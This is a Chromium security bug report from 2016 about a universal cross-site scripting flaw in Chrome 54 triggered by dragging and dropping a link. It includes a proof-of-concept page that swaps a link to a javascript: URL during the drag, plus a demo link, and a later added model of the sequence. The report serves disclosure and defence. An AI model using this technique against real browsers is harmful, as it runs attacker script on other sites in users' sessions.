Security: Chrome UXSS with Drag&Drop
Reported by
xis...@gmail.com,
Oct 31 2016
Issue description
VULNERABILITY DETAILS
Chrome UXSS with Drag&Drop
VERSION
Chrome Version: 54.0.2840.71 (64-bit)+[Stable]
Operating System: [MAC OS 10.12.1, Windows 7&10]
REPRODUCTION CASE
Drag and drop links to the current TAB.
POC:
<script>
document.addEventListener("dragstart", function() {
location='http://www.google.com';
});
function ee(){
document.getElementById('bb').setAttribute('href', 'javascript:alert(document.domain)');
}
</script>
<a id='bb' onmousedown="ee()" href="http://www.google.com/">www.google.com</a>
,
Nov 1 2016
I have given an attack scenario in my video attachment xss.mov. When a user opens a new page and drags and drops a link onto the current tab, the location changes to the target site at the start of the drag and drop, and when the user completes the drag and drop the JavaScript will be executed on the target site. The whole process of drag and drop is very short, so it is difficult for users to detect. Demo: http://xisigr.com/test/uxss/chrome/atOgsfyyUOSDF9.html
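The sequence described in the comment above, modelled as an added example; it is not part of the original report and is not Chrome's code or the fix referenced in this issue. The `tab` object, `startDrag`, `naiveDrop`, `checkedDrop`, `replay` and the `attacker.example` host are hypothetical names, and the origin comparison is an assumed mitigation chosen for illustration.

```javascript
// Model of a tab receiving a dropped link. Assumption: this is not Chrome's code.
function originOf(url) {
  return new URL(url).origin;
}

// dragstart: record the origin of the document that supplied the drag data.
function startDrag(tab, href) {
  return { href, sourceOrigin: originOf(tab.url) };
}

// Naive drop: a javascript: URL runs in whatever document is in the tab now.
function naiveDrop(tab, drag) {
  if (new URL(drag.href).protocol !== "javascript:") {
    return { action: "navigate" };
  }
  return { action: "run-script", inOrigin: originOf(tab.url) };
}

// Checked drop: refuse a script URL when the tab no longer shows a document
// from the origin the drag started in (assumed mitigation).
function checkedDrop(tab, drag) {
  const result = naiveDrop(tab, drag);
  if (result.action === "run-script" && result.inOrigin !== drag.sourceOrigin) {
    return { action: "block", reason: "drag source origin differs from destination" };
  }
  return result;
}

// Constructed replay of the sequence in the report.
function replay(dropHandler) {
  const tab = { url: "http://attacker.example/poc.html" }; // constructed page URL
  const href = "javascript:alert(document.domain)";         // href after onmousedown
  const drag = startDrag(tab, href);                        // dragstart fires
  tab.url = "http://www.google.com/";                       // dragstart handler sets location
  return dropHandler(tab, drag);                            // link released on the tab
}
```

Calling `replay(naiveDrop)` shows the script URL being evaluated in the navigated-to origin, while `replay(checkedDrop)` blocks it because the origin recorded at dragstart no longer matches the tab.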
,
Nov 7 2016
I believe this was fixed in M55 via Issue 639750.
,
Nov 8 2016
If this still repro's with >=M55, please re-file. Thanks.
,
Nov 8 2016
,
Feb 14 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by ta...@google.com, Oct 31 2016